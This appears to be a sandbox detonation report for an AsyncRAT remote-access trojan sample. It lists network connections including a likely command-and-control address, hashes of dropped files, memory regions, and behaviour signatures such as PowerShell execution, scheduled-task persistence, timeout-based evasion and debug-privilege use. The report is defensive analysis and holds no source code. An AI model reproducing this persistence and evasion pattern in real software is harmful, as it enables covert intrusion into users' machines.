US 8.8.8.8:53 c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa udp
N/A 239.255.255.250:3702 udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 225.88.219.68.in-addr.arpa udp
US 8.8.8.8:53 94.189.21.2.in-addr.arpa udp
US 147.185.221.19:52033 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

MD5 b8ccfc163e2d56a73b6fd7387a45e6eb
SHA1 f81a368c275574fa808a92d29c5e0b37e01162ce
SHA256 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
SHA512 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf

memory/2280-11-0x0000000000740000-0x0000000000758000-memory.dmp

memory/3732-13-0x0000000005040000-0x0000000005076000-memory.dmp

memory/3732-15-0x0000000005780000-0x0000000005DA8000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/3732-17-0x0000000005560000-0x0000000005582000-memory.dmp

memory/2820-19-0x0000000004FE0000-0x0000000005046000-memory.dmp

memory/3732-18-0x0000000005E60000-0x0000000005EC6000-memory.dmp

memory/3732-20-0x0000000006040000-0x0000000006394000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1kgkasq.c02.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3732-50-0x0000000006600000-0x000000000661E000-memory.dmp

memory/3732-51-0x0000000006B70000-0x0000000006BBC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MAIN.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

memory/3732-79-0x0000000070700000-0x000000007074C000-memory.dmp

memory/3732-78-0x0000000006AD0000-0x0000000006B02000-memory.dmp

memory/3732-89-0x0000000006AB0000-0x0000000006ACE000-memory.dmp

memory/3732-99-0x00000000077F0000-0x0000000007893000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat

MD5 3e05d4bfd657616e447d2061c92a339e
SHA1 8c4fe7300b105e047f256083c181ca1648ff4a84
SHA256 298a1e490112604bd21212e5fb9e0110bb14c861b59f68656d878d14f3ab9ffb
SHA512 54270b4ed6c69a2a4dc1e18c3df8f3e56e922e7c97354283607b2e012f4b3bb07dff0c9b9bccbf3e9601895d82708d86eff907d5da9f6ab0bb7fb1c2dcb245ba

memory/2820-101-0x0000000070700000-0x000000007074C000-memory.dmp

memory/3732-111-0x0000000007FE0000-0x000000000865A000-memory.dmp

memory/3732-112-0x0000000006C00000-0x0000000006C1A000-memory.dmp

memory/3732-114-0x0000000007990000-0x000000000799A000-memory.dmp

memory/4788-115-0x0000000070700000-0x000000007074C000-memory.dmp

memory/3732-135-0x0000000007BB0000-0x0000000007C46000-memory.dmp

memory/3732-136-0x0000000007B20000-0x0000000007B31000-memory.dmp

memory/5000-147-0x0000000070700000-0x000000007074C000-memory.dmp

memory/4832-157-0x0000000070700000-0x000000007074C000-memory.dmp

memory/3732-177-0x0000000007B60000-0x0000000007B6E000-memory.dmp

memory/2820-178-0x0000000007410000-0x0000000007424000-memory.dmp

memory/3732-180-0x0000000007C50000-0x0000000007C6A000-memory.dmp

memory/3732-181-0x0000000007BA0000-0x0000000007BA8000-memory.dmp

memory/2864-195-0x0000000070700000-0x000000007074C000-memory.dmp

memory/4412-215-0x0000000070700000-0x000000007074C000-memory.dmp

memory/388-245-0x0000000070700000-0x000000007074C000-memory.dmp

memory/4596-266-0x0000000070700000-0x000000007074C000-memory.dmp

memory/2496-295-0x0000000070700000-0x000000007074C000-memory.dmp

memory/4040-306-0x0000000070700000-0x000000007074C000-memory.dmp

memory/5048-337-0x0000000070700000-0x000000007074C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

memory/2152-358-0x0000000070700000-0x000000007074C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 347ce576af1cd27fb64dc9dfe3646769
SHA1 3e5d4569f825c425180329154a3cc6355dbd3b18
SHA256 698adb374c4d6dd53b82167dafbe24443b0ac86674e51049e57147d535fb56a7
SHA512 b1f96c27f4c2fff33bd9ef65c4b2a779ad0192527a3cdb2e28b2fe9176aa4b6d57cebc3662f4c3b82ed3b46c2178f0c591036be1e883f4cdff8d44b16585fdbf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b72e09c578d326a4869a6267fa375140
SHA1 ba87058e3d5b244d012a76297bc98107015e7a58
SHA256 3e02d16e7e561520c8ff36de504bd56ba5493f8ada95322e40430c7f5237e458
SHA512 30f2b84001d02e11e6f9d2e515a40ebe7d26a3811937fbfe1b72226a759cbf61fb8c72ec0cbc1295313f0b8fab8d499344c42979a7b7000cab0ad2198ca15463

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a52c354e555bb6ab2bc528a52f364c4
SHA1 04f0a60a285cce4efac88dc7833c375018f4161e
SHA256 3af66224242bd49cba61632a2b02bfc9dffcb459af99f59dd2a98735b77c6dda
SHA512 59e6a4fc993127ab38cc0f39d53ed938939622292b4f126e188ca9a501ef16f1e69e80b24c65d5ec7b90c388397c92ad67248b83a22b5fe3de58b4c08a1af101

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json

MD5 e516a60bc980095e8d156b1a99ab5eee
SHA1 238e243ffc12d4e012fd020c9822703109b987f6
SHA256 543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7
SHA512 9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\update100[1].xml

MD5 53244e542ddf6d280a2b03e28f0646b7
SHA1 d9925f810a95880c92974549deead18d56f19c37
SHA256 36a6bd38a8a6f5a75b73caffae5ae66dfabcaefd83da65b493fa881ea8a64e7d
SHA512 4aa71d92ea2c46df86565d97aac75395371d3e17877ab252a297b84dca2ab251d50aaffc62eab9961f0df48de6f12be04a1f4a2cbde75b9ae7bcce6eb5450c62

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 07:20

Reported

2024-06-03 07:24

Platform

win7-20240221-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Steam.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
